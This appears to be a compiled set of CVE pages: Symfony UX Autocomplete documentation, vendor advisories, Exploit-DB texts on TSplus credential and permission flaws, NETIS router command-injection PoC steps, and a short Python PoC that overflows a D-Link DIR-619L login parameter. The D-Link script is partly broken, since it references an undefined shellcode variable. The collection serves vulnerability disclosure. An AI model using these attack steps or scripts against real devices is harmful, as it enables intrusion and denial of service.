ux-autocomplete is a JavaScript Autocomplete functionality for Symfony. Under certain circumstances, an attacker could successfully submit an entity id for an `EntityType` that is *not* part of the valid choices. The problem has been fixed in `symfony/ux-autocomplete` version 2.11.2.

**Autocomplete <select>**Edit this page

**Autocomplete <select>**

Transform your EntityType, ChoiceType or _any_ <select> element into an Ajax-powered autocomplete smart UI control (leveraging Tom Select):

**Installation**

Before you start, make sure you have StimulusBundle configured in your app.

Then install the bundle using Composer and Symfony Flex:

If you're using WebpackEncore, install your assets and restart Encore (not needed if you're using AssetMapper):

**Usage in a Form (without Ajax)**

Any ChoiceType or EntityType can be transformed into a Tom Select-powered UI control by adding the autocomplete option:

That's all you need! When you refresh, the Autocomplete Stimulus controller will transform your select element into a smart UI control:

**Usage in a Form (with Ajax)**

In the previous example, the autocomplete happens "locally": all of the options are loaded onto the page and used for the search.

If you're using an EntityType with _many_ possible options, a better option is to load the choices via AJAX. This also allows you to search on more fields than just the "displayed" text.

To transform your field into an Ajax-powered autocomplete, you need to create a new "form type" class to represent your field. If you have MakerBundle installed, you can run:

Or, create the field by hand:

There are 3 important things:

1.  The class needs the #[AsEntityAutocompleteField] attribute so that it's noticed by the autocomplete system.
2.  The getParent() method must return ParentEntityAutocompleteType.
3.  Inside configureOptions(), you can configure your field using whatever normal EntityType options you need plus a few extra options (see Form Options Reference).

After creating this class, use it in your form:

Caution

Avoid passing any options to the 3rd argument of the ->add() method as these won't be used during the Ajax call to fetch results. Instead, include all options inside the custom class (FoodAutocompleteField).

Congratulations! Your EntityType is now Ajax-powered!

**Styling Tom Select**

In your assets/controllers.json file, you should see a line that automatically includes a CSS file for Tom Select which will give you basic styles.

If you're using Bootstrap, set tom-select.default.css to false and tom-select.bootstrap5.css to true:

To further customize things, you can override the classes with your own custom CSS and even control how individual parts of Tom Select render. See Tom Select Render Templates.

**Form Options Reference**

All ChoiceType, EntityType and TextType fields have the following new options (these can also be used inside your custom Ajax autocomplete classes, e.g. FoodAutocompleteField from above):

autocomplete (default: false)

Set to true to activate the Stimulus plugin on your select element.

tom_select_options (default: [])

Use this to set custom Tom Select Options. If you need to set an option using JavaScript, see Extending Tom Select.

options_as_html (default: false)

Set to true if your options (e.g. choice_label) contain HTML. Not needed if your autocomplete is AJAX-powered.

autocomplete_url (default: null)

Usually you don't need to set this manually. But, you _could_ manually create an autocomplete-Ajax endpoint (e.g. for a custom ChoiceType), then set this to change the field into an AJAX-powered select.

no_results_found_text (default: 'No results found')

Rendered when no matching results are found. This message is automatically translated using the AutocompleteBundle domain.

no_more_results_text (default: 'No more results')

Rendered at the bottom of the list after showing matching results. This message is automatically translated using the AutocompleteBundle domain.

For the Ajax-powered autocomplete field classes (i.e. those whose getParent() returns ParentEntityAutocompleteType), in addition to the options above, you can also pass:

searchable_fields (default: null)

Set this to an array of the fields on your entity that should be used when searching for matching options. By default (i.e. null), _all_ fields on your entity will be searched. Relationship fields can also be used - e.g. category.name if your entity has a category relation property.

security (default: false)

Secures the Ajax endpoint. By default, the endpoint can be accessed by any user. To secure it, pass security to a string role (e.g. ROLE_FOOD_ADMIN) that should be required to access the endpoint. Or, pass a callback and return true to grant access or false to deny access:

filter_query (default: null)

If you want to completely control the query made for the "search results", use this option. This is incompatible with searchable_fields:

max_results (default: 10)

Allow you to control the max number of results returned by the automatic autocomplete endpoint.

min_characters (default: 3)

Allow you to control the min number of characters to load results.

preload (default: focus)

Set to focus to call the load function when control receives focus. Set to true to call the load upon control initialization (with an empty search).

**Using with a TextType Field**

All of the above options can also be used with a TextType field:

This <input> field won't have any autocomplete, but it _will_ allow the user to enter new options and see them as nice "items" in the box. On submit, all of the options - separated by the delimiter - will be sent as a string.

You _can_ add autocompletion to this via the autocomplete_url option - but you'll likely need to create your own custom autocomplete endpoint.

**Customizing the AJAX URL/Route**

2.7

The ability to specify the route was added in Twig Components 2.7.

The default route for the Ajax calls used by the Autocomplete component is /autocomplete/{alias}/. Sometimes it may be useful to customize this URL - e.g. so that the URL lives under a specific firewall.

To use another route, first declare it:

Then specify this new route on the attribute:

**Extending Tom Select**

The easiest way to customize Tom Select is via the tom_select_options option that you pass to your field. This works great for simple things like Tom Select's loadingClass option, which is set to a string. But other options, like onInitialize, must be set via JavaScript.

To do this, create a custom Stimulus controller and listen to one or both events that the core Stimulus controller dispatches:

Note

The extending controller should be loaded eagerly (remove /* stimulusFetch: 'lazy' */), so it can listen to events dispatched by the original controller.

Then, update your field configuration to use your new controller (it will be used in addition to the core Autocomplete controller):

Or, if using a custom Ajax class, add the attr option to your configureOptions() method:

**Advanced: Creating an Autocompleter (with no Form)**

If you're not using the form system, you can create an Ajax autocomplete endpoint and then initialize the Stimulus controller manually. This only works for Doctrine entities: see Manually using the Stimulus Controller if you're autocompleting something other than an entity.

To expose the endpoint, create a class that implements Symfony\UX\Autocomplete\EntityAutocompleterInterface and tag this service with ux.entity_autocompleter, including an alias option:

Thanks to this, your can now autocomplete your Food entity via the ux_entity_autocomplete route and alias route wildcard:

Usually, you'll pass this URL to the Stimulus controller, which is discussed in the next section.

**Manually using the Stimulus Controller**

This library comes with a Stimulus controller that can activate Tom Select on any select or input element. This can be used outside of the Form component. For example:

That's it! If you want the options to be autocompleted via Ajax, pass a url value, which works well if you create a custom autocompleter:

Note

If you want to create an AJAX autocomplete endpoint that is _not_ for an entity, you will need to create this manually. The only requirement is that the response returns JSON with this format:

for using Tom Select Option Group the format is as follows

Once you have this, generate the URL to your controller and pass it to the url value of the stimulus_controller() Twig function, or to the autocomplete_url option of your form field. The search term entered by the user is passed as a query parameter called query.

Beyond url, the Stimulus controller has various other values, including tomSelectOptions. See the controller.ts file for the full list.

**Unit testing**

When writing unit tests for your form, using the TypeTestCase class, you consider registering the needed type extension AutocompleteChoiceTypeExtension like so:

**Known Issue when using with Live Component**

You _can_ use autocomplete inside of a Live Component: the autocomplete JavaScript widget should work normally and even update if your element changes (e.g. if you add or change <option> elements. Internally, a MutationObserver inside the UX autocomplete controller detects these changes and forwards them to TomSelect.

However, if you use the multiple option, due to complexities in TomSelect, the autocomplete widget _will_ work, but it will not update if you change any options. For example, if your change the "options" for a select during re-render, those will not update on the frontend.

CVE-2023-41336: Symfony UX Autocomplete Documentation


Dover Fueling Solutions MAGLINK LX Web Console Configuration versions 2.5.1, 2.5.2, 2.5.3, 2.6.1, 2.11, 3.0, 3.2, and 3.3 are vulnerable to authentication bypass that could allow an unauthorized attacker to obtain user access.



CVE-2023-41256

Interact 7.9.79.5 allows stored Cross-site Scripting (XSS) attacks in several locations, allowing an attacker to store a JavaScript payload.

**Abstract Advisory Information**

The feature, to attach a document to a post, is prone to stored Cross-site Scripting (XSS) attacks in several locations allowing an attacker to store a JavaScript payload.

Author: Dominique Righetto

**Version affected**

Name: Interact Software

Versions: 7.9.79.5

**Common Vulnerability Scoring System**

CVSS SCORE 5.4

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

**Patch**

No patch available

**References**

CVE – CVE-2023-41103 (mitre.org)

**Vulnerability Disclosure Timeline**

*   *   20/05/2022: Vulnerability discovery
    *   22/05/2022: Vulnerability Report to CERT-XLM
    *   05/06/2022: Vulnerability Report to Vendor through investigation
    *   05/06/2022: Vulnerability Report to Vendor through investigation
    *   13/06/2022: Vulnerability Report to Vendor through investigation
    *   20/06/2022: Community account creation asked to InteractSoftware to contact their technical departement
    *   20/06/2022: Vulnerability Report to Vendor through investigation
    *   20/06/2022: Urge vendor to reply via twitter
    *   04/07/2023: Update asking to vendor through investigation
    *   04/07/2023: Update asking to vendor for the community account creation
    *   15/07/2023: Ticket for a community account creation closed
    *   17/07/2023: Reply to help@interact-intranet.com asking for an update
    *   19/07/2023: Reply to help@interact-intranet.com asking for an update
    *   01/08/2023: Phonecall to +1 (646) 564 5775, gave vendor information for them to reach us back
    *   01/08/2023: Phonecall to +1 (646) 564 5775
    *   16/08/2023: Phonecall to +1 (646) 564 5775, got redirected to help@interactsoftware.com.
    *   16/08/2023: Update asked to help@interactsoftware.com.
    *   16/08/2023: Request CVE ID to Mitre
    *   23/08/2023: CVE IDs assigned : CVE-2023-41103
    *   24/08/2023: Vulnerabilty disclosure

Our website uses cookies technologies to assist with navigation and your ability to provide feedback, analyze your use of our products and services, to enable you to use the social media functionalities and assist with our promotional and marketing efforts, and provide content from third parties. You may choose to opt-out from all non-essential cookies or allow them for a better browsing experience.  
For more information on the use of cookies, Please check our Privacy Notice ACCEPT REJECT SETTINGS

CVE-2023-41103: CVE-2023-41103 - Excellium Services

Buffer Overflow vulnerability in NBD80S09S-KLC v.YK_HZXM_NBD80S09S-KLC_V4.03.R11.7601.Nat.OnvifC.20230414.bin and NBD80N32RA-KL-V3 v.YK_HZXM_NBD80N32RA-KL_V4.03.R11.7601.Nat.OnvifC.20220120.bin allows a remote attacker to casue a denial of service via a crafted request to the service.XM component.

**Buffer overflow vulnerability exists in Web service firmware of some devices****2023-07-05 14:00:57**

No：XM-SN-XMSRC2301

Release date：2023-07-05

Summary

Buffer overflow vulnerability exists in Web service firmware of some devices, it allow the remote attackers to exploit vulnerabilities to send special requests, which lead the web service refused the service.XM have fix this vulnerability in the new firmware.  

Software version

Vulnerability rating details

The vulnerability has been graded through the CVSSv3 rating system  

（http://www.first.org/cvss/specification-document）

Basic score: 6.9（AV:N / AC：H / PR：N / UI：R / S：C / C：L / I：N / A：H）

Get the new release

Contact XM Technical Support to obtain the corresponding  firmware or download it from the XM baike website download center - Product Firmware Download.

Revision History

2023-07-05 V1.0 Initial version

CVE-2023-39068: Hangzhou Xiongmai Technology Co.,LTD.-Buffer overflow vulnerability exists in Web service firmware of some devices

Zoho ManageEngine ADManager Plus before Build 7200 allows admin users to execute commands on the host machine.

**Vulnerability details**

**Severity**

Low

**CVE ID**

CVE- 2023-38743

**Affected software versions**

Build 7188 and older

**Fixed version**

Build 7200

**Fixed on**

June 13, 2023

**Details**

In ADManager Plus builds 7188 and older, an authenticated RCE vulnerability was reported. This has been fixed in the build 7200 and the release notes for it can be found here.

**Impact**

Authenticated users with admin privileges can run an arbitrary command on the host machine in which ADManager Plus is installed.

**Steps to update**

Update ADManager Plus instance to its latest build by installing the service pack.

**Acknowledgement**

This issue was reported anonymously by a user on Trend Micro's Zero Day Initiative Published Advisories website.

Select a language to translate the contents of this web page:

CVE-2023-38743: Authenticated RCE vulnerability in ADManager Plus | CVE

An issue in NETIS SYSTEMS WF2409E v.3.6.42541 allows a remote attacker to execute arbitrary code via the ping and traceroute functions of the diagnostic tools component in the admin management interface.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

*   Notifications
*   Fork 0

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Security
*   Insights

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**CVE-2023-38829-NETIS-WF2409E****NETIS SYSTEMS Router WF2409E Command Injection PoC****Vulnerability Description:**

The ping and traceroute functions of the NETIS SYSTEMS Router WF2409E (version V3.6.42541) are susceptible to command injection attacks. Malicious input can be crafted in the parameters of these functions through the Web admin management interface, allowing arbitrary commands to be executed with the privileges of the affected process.

**PoC Steps:**

1.  Identify the Target:
    
    *   Ensure you have access to the NETIS SYSTEMS Router WF2409E (version V3.6.42541) Web admin management interface.
2.  Open the Ping Function:
    
    *   Log in to the router's web interface.
    *   Navigate to the "Diagnostic Tools" section.
    *   Select the "Ping" function.
3.  Craft Malicious Input:
    
    *   In the "Ping" function input field, inject a command. For example:

4.  Execute the Command:
    
    *   Submit the crafted input.
    *   Observe the output. If the directory listing of the router's filesystem is displayed, the command injection is successful.
5.  Open the Traceroute Function:
    
    *   Navigate back to the "Diagnostic Tools" section.
    *   Select the "Traceroute" function.
6.  Craft Malicious Input:
    
    *   In the "Traceroute" function input field, inject a command. For example:
7.  Execute the Command:
    
    *   Submit the crafted input.
    *   Check if the output includes the result of the ls command. If so, the command injection is demonstrated.

**Notes:**

*   This PoC is for educational and responsible disclosure purposes only.
*   Do not use this PoC on systems you don't have permission to test.
*   Ensure you have proper authorization before attempting any security testing.

CVE-2023-38829: GitHub - adhikara13/CVE-2023-38829-NETIS-WF2409E

An issue was discovered in TSplus Remote Access through 16.0.2.14. Credentials are stored as cleartext within the HTML source code of the login page.

    # Exploit Title: TSPlus 16.0.0.0 - Remote Work Insecure Credential storage# Date: 2023-08-09# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia# Vendor Homepage: https://tsplus.net/# Version: Up to 16.0.0.0# Tested on: Windows# CVE : CVE-2023-31069With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single sign-on web portal and remote desktop gateway that enables users to remotely access the console session of their office PC.It is possible to create a custom web portal login page which allows a user to login without providing their credentials.However, the credentials are stored in an insecure manner since they are saved in cleartext, within the html login page.This means that everyone with an access to the web login page, can easely retrieve the credentials to access to the application by simply looking at the html code page.This is a code snippet extracted by the source code of the login page (var user and var pass):   // --------------- Access Configuration ---------------   var user = "Admin";                         // Login to use when connecting to the remote server (leave "" to use the login typed in this page)   var pass = "SuperSecretPassword";           // Password to use when connecting to the remote server (leave "" to use the password typed in this page)   var domain = "";                            // Domain to use when connecting to the remote server (leave "" to use the domain typed in this page)   var server = "127.0.0.1";                   // Server to connect to (leave "" to use localhost and/or the server chosen in this page)   var port = "";                              // Port to connect to (leave "" to use localhost and/or the port of the server chosen in this page)   var lang = "as_browser";                    // Language to use   var serverhtml5 = "127.0.0.1";              // Server to connect to, when using HTML5 client   var porthtml5 = "3389";                     // Port to connect to, when using HTML5 client   var cmdline = "";                           // Optional text that will be put in the server's clipboard once connected   // --------------- End of Access Configuration ---------------

CVE-2023-31069: TSPlus 16.0.0.0 Insecure Credential Storage ≈ Packet Storm

An issue was discovered in TSplus Remote Access through 16.0.2.14. There are Full Control permissions for Everyone on some directories under %PROGRAMFILES(X86)%\TSplus\UserDesktop\themes.

    # Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions
    # Date: 2023-08-09
    # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
    # Vendor Homepage: https://tsplus.net/
    # Version: Up to 16.0.0.0
    # Tested on: Windows
    # CVE : CVE-2023-31068
    
    With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single 
    sign-on web portal and remote desktop gateway that enables users to 
    remotely access the console session of their office PC.
    The solution comes with an embedded web server to allow remote users to 
    easely connect remotely.
    However, insecure file and folder permissions are set, and this could 
    allow a malicious user to manipulate file content (e.g.: changing the 
    code of html pages or js scripts) or change legitimate files (e.g. 
    Setup-RemoteWork-Client.exe) in order to compromise a system or to gain 
    elevated privileges.
    
    This is the list of insecure files and folders with their respective 
    permissions:
    
    Permission: Everyone:(OI)(CI)(F)
    
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\prints
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\shared
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\locales
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\des
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenu
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\parts
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\img\cp
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\img\srv
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log
    
    -------------------------------------------------------------------------------------------
    
    Permission: Everyone:(F)
    
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txt
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.config
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.html
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.js
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.js
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jar
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jar
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.html
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.html
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\index.html
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.html
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.bin
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.js
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.js
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.js
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js

CVE-2023-31068: OffSec’s Exploit Database Archive

An issue was discovered in TSplus Remote Access through 16.0.2.14. There are Full Control permissions for Everyone on some directories under %PROGRAMFILES(X86)%\TSplus\Clients\www.

    # Exploit Title: TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions
    # Date: 2023-08-09
    # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
    # Vendor Homepage: https://tsplus.net/
    # Version: Up to 16.0.2.14
    # Tested on: Windows
    # CVE : CVE-2023-31067
    
    TSplus Remote Access (v. 16.0.2.14) is an alternative to Citrix and 
    Microsoft RDS for remote desktop access and Windows application 
    delivery. Web-enable your legacy apps, create SaaS solutions or remotely 
    access your centralized corporate tools and files.
    The TSplus Remote Access solution comes with an embedded web server to 
    allow remote users to easely connect remotely.
    However, insecure file and folder permissions are set and this could 
    allow a malicious user to manipulate file content (e.g.: changing the 
    code of html pages or js scripts) or change legitimate files (e.g. 
    Setup-VirtualPrinter-Client.exe) in order to compromise a system or to 
    gain elevated privileges.
    
    This is the list of insecure files and folders with their respective 
    permissions:
    Everyone:(OI)(CF)(F) and Everyone(F)
    Permission: Everyone:(OI)(CI)(F)
    
    C:\Program Files (x86)\TSplus\Clients\www
    C:\Program Files (x86)\TSplus\Clients\www\addons
    C:\Program Files (x86)\TSplus\Clients\www\ConnectionClient
    C:\Program Files (x86)\TSplus\Clients\www\downloads
    C:\Program Files (x86)\TSplus\Clients\www\prints
    C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient
    C:\Program Files (x86)\TSplus\Clients\www\software
    C:\Program Files (x86)\TSplus\Clients\www\var
    C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp
    C:\Program Files (x86)\TSplus\Clients\www\downloads\shared
    C:\Program Files (x86)\TSplus\Clients\www\software\java
    C:\Program Files (x86)\TSplus\Clients\www\software\js
    C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres
    C:\Program Files (x86)\TSplus\Clients\www\software\html5\locales
    C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\topmenu
    C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\key\parts
    C:\Program Files (x86)\TSplus\Clients\www\software\java\img
    C:\Program Files (x86)\TSplus\Clients\www\software\java\third
    C:\Program Files (x86)\TSplus\Clients\www\software\java\img\cp
    C:\Program Files (x86)\TSplus\Clients\www\software\java\img\srv
    C:\Program Files (x86)\TSplus\Clients\www\software\java\third\images
    C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\java\third\images\bramus
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\java\third\js\prototype
    C:\Program Files (x86)\TSplus\Clients\www\var\log
    C:\Program Files (x86)\TSplus\UserDesktop\themes
    C:\Program Files (x86)\TSplus\UserDesktop\themes\BlueBar
    C:\Program Files (x86)\TSplus\UserDesktop\themes\Default
    C:\Program Files (x86)\TSplus\UserDesktop\themes\GreyBar
    C:\Program Files (x86)\TSplus\UserDesktop\themes\Logon
    C:\Program Files (x86)\TSplus\UserDesktop\themes\MenuOnTop
    C:\Program Files (x86)\TSplus\UserDesktop\themes\Seamless
    C:\Program Files (x86)\TSplus\UserDesktop\themes\ThinClient
    C:\Program Files (x86)\TSplus\UserDesktop\themes\Vista
    
    ------------------------------------------------------------------------------
    
    Permission: Everyone:(F)
    
    C:\Program Files (x86)\TSplus\Clients\www\all.min.css
    C:\Program Files (x86)\TSplus\Clients\www\custom.css
    C:\Program Files (x86)\TSplus\Clients\www\popins.css
    C:\Program Files (x86)\TSplus\Clients\www\robots.txt
    C:\Program Files 
    (x86)\TSplus\Clients\www\addons\Setup-VirtualPrinter-Client.exe
    C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\hb.exe.config
    C:\Program Files 
    (x86)\TSplus\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
    C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp\index.html
    C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient\index.html
    C:\Program Files (x86)\TSplus\Clients\www\software\common.css
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\jwres\jwwebsockify.jar
    C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\web.jar
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\exitlist.html
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\exitupload.html
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\getlist.html
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\getupload.html
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\postupload.html
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\uploaderr.html
    C:\Program Files (x86)\TSplus\Clients\www\software\java\index.html
    C:\Program Files (x86)\TSplus\Clients\www\software\java\img\index.html
    C:\Program Files (x86)\TSplus\Clients\www\software\java\img\port.bin
    C:\Program Files (x86)\TSplus\Clients\www\software\java\third\jws.js
    C:\Program Files (x86)\TSplus\Clients\www\software\java\third\sha256.js
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\java\third\js\prototype\prototype.js
    C:\Program Files (x86)\TSplus\Clients\www\software\js\jquery.min.js

CVE-2023-31067: OffSec’s Exploit Database Archive

Buffer overflow vulnerability in DLINK 619L version B 2.06beta via the FILECODE parameter on login.

**dir\_619l-buffer-overflow**

**Vender** ：D-Link

**Firmware version**:2.06beta

**Exploit Author**: ys110

**Vendor Homepage**: http://www.dlink.com.cn/

**Hardware Link**:http://support.dlink.com.cn/ProductInfo.aspx?m=DIR-619L

**Vul detail**

In the handler of router / goform / Login, the http request parameter “filecode” is obtained through the webgetvar function

When the router login webpage is set to log in with the verification code, the filecode parameter is assigned to the a1 register and transmitted to the getauthcode function

The filecode parameter in the getauthcode function is Copy it into the a2 register, the sprintf function copies it to the local stack, however, it does not check the length, and a very long input could lead to stack overflow and overwrite the return address:

**poc**

import requests
import sys
import struct
import string
import base64
def login(shellcode,user,password,ip):
	postData \= {
	'login\_name':'yuanshuo',
	'curTime':"12345",
	'FILECODE':"a"\*300,
	'VER\_CODE':'vercode',
	'VERIFICATION\_CODE':'12345',
	'login\_n':user,
	'login\_pass':password,
	}
	response \= requests.post('http://192.168.1.1/goform/formLogin',data=postData)
        
        #print 'http://' + ip + '/goform/formLogin'
        print response.json

if \_\_name\_\_ \=\= "\_\_main\_\_":
	login(shellcode,'admin', base64.b64encode('shuoshuo110'),'192.168.1.1')

CVE-2020-19319: GitHub - hhhhu8045759/dir_619l-buffer-overflow: The router is set to open the graphical login. An unauthorized attacker can send attack packets to cause code execution.

Tag

#web